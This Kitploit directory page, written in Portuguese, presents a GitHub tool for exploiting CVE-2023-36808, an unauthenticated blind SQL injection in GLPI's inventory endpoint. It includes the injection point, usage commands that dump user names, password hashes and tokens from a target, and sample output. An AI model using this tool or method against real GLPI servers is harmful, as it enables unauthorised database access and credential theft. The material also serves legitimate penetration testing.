Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fransosiche/exploit-cve-2023-36808
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

GLPI cve-2023-36808

Ver Repositório
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-36808 - Injeção SQL não autenticada no GLPI

Vulnerabilidade

As versões < 10.0.10 do GLPI expõem um endpoint de inventário XML não autenticado em /front/inventory.php.
O campo <deviceid> é injetado diretamente em uma consulta SQL sem sanitização:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

Nenhuma autenticação é necessária. A vulnerabilidade permite acesso total de leitura ao banco de dados por meio de injeção SQL cega.

Exploit

Este script usa injeção cega baseada em tempo com pesquisa binária para extrair dados significativamente mais rápido que ferramentas genéricas.

  • Um SLEEP por verificação booleana (confiável independentemente do tamanho da tabela)
  • Pesquisa binária: ~7 requisições por caractere em vez de 95
  • Paralelismo em nível de campo: nome, senha e token extraídos simultaneamente por usuário
  • Limite de concorrência evita interferência de tempo entre requisições paralelas

Requisitos

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

Exemplo de saída

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

Referências

  • NVD - CVE-2023-36808
  • Aviso de Segurança do GLPI
Baixar ferramenta